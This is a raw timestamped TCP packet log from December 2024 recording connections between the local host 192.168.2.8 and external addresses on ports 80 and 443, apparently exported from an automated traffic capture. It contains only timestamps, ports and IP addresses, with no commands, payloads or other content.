                                                                                                                                                                                          Dec 18, 2024 09:07:24.421283007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.422060013 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.422175884 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.422192097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.422225952 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.422259092 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.423238039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.423474073 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.583657026 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.583830118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.583844900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.583877087 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.583899975 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.583971977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.584142923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.584182024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.584245920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.584260941 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.584296942 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585001945 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585086107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585099936 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585124016 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585136890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585865021 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585947037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585962057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.585984945 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.586011887 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.586882114 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.586957932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.586975098 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.586997986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.587023973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.587599039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.587687969 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.587707996 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.587727070 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.587753057 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.588474989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.588566065 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.588579893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.588603973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.588629007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.589354992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.589443922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.589457989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.589487076 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.589500904 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.590241909 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.590332031 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.590373993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.590464115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.591099977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.591171026 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.591186047 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.591207027 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.591224909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.591950893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.592036009 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.592050076 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.592072964 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.592092991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.592878103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.592958927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.592973948 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.592994928 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.593017101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.593736887 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.593815088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.593828917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.593852997 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.593873978 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.594578981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.594644070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.594659090 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.594681025 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.594701052 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.595457077 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.595546007 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.595560074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.595594883 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.596309900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.596352100 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.596401930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.596416950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.596451044 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.597206116 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.597268105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.597282887 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.597306013 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.597318888 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.598489046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.598568916 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.598583937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.598609924 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.598629951 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.598926067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599004984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599019051 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599042892 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599064112 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599785089 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599864006 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599878073 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599904060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.599924088 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:24.993927956 CET44349717104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.994200945 CET44349717104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:24.994280100 CET49717443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:24.995639086 CET49717443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:24.995655060 CET44349717104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:25.468933105 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:25.469042063 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:25.469126940 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:25.469830036 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:25.469866991 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:26.684972048 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:26.685085058 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:26.686871052 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:26.686902046 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:26.687304974 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:26.688937902 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:26.689202070 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:26.689249992 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:26.689342976 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:26.689358950 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:26.924365044 CET4971280192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:26.924715042 CET4971980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:27.044449091 CET8049719185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:27.044487953 CET8049712185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:27.044545889 CET4971980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:27.044586897 CET4971280192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:27.044841051 CET4971980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:27.164432049 CET8049719185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:27.628983974 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:27.629090071 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:27.629224062 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:27.629426956 CET49718443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:27.629471064 CET44349718104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:28.376029015 CET8049719185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:28.376125097 CET4971980192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:28.378403902 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:28.378891945 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:28.487740993 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:28.487809896 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:28.487906933 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:28.488240957 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:28.488256931 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:28.498327017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:28.498409033 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:28.498486996 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:28.498605967 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:28.498786926 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:28.618247986 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.695250988 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.695338011 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:29.696655989 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:29.696680069 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.696922064 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.698268890 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:29.698390961 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:29.698404074 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827635050 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827711105 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827765942 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827789068 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827800035 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827837944 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827846050 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827883959 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827889919 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827927113 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827929974 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.827979088 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.828012943 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.828022003 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.828099966 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.828142881 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.947691917 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.947736979 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.947807074 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.951796055 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.951855898 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:29.951873064 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:29.951950073 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.018748045 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.018811941 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.018824100 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.018877029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.022886992 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.022989988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.023037910 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.031263113 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.031333923 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.034313917 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.034368992 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.034440041 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.034492970 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.042725086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.042787075 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.042792082 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.042845964 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.051093102 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.051152945 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.051189899 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.051235914 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.059489965 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.059561968 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.059606075 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.060172081 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.067806005 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.067864895 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.067903996 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.067943096 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.076168060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.076221943 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.076250076 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.076288939 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.084614038 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.084717989 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.084741116 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.084785938 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.093106031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.093214035 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.093277931 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.100402117 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.100461960 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.100480080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.100523949 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.107465029 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.107985020 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.209849119 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.209932089 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.210016012 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.212038040 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.212156057 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.212882996 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.212934971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.212977886 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.213025093 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.217478037 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.217539072 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.217565060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.218193054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.222040892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.222119093 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.222179890 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.226617098 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.226692915 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.226747036 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.231209040 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.231277943 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.231303930 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.231348038 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.235758066 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.235841036 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.235894918 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.240400076 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.240437031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.240467072 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.240499973 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.244934082 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.244967937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.245003939 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.245038033 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.249483109 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.249555111 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.249603987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.249644995 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.254045963 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.254084110 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.254106998 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.254143953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.258615971 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.258688927 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.258719921 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.258753061 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.263159990 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.263232946 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.263251066 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.263288975 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.267719984 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.267786026 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.267839909 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.272320032 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.272384882 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.272387981 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.272428989 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.276873112 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.276953936 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.277005911 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.281399012 CET804972031.41.244.11192.168.2.8
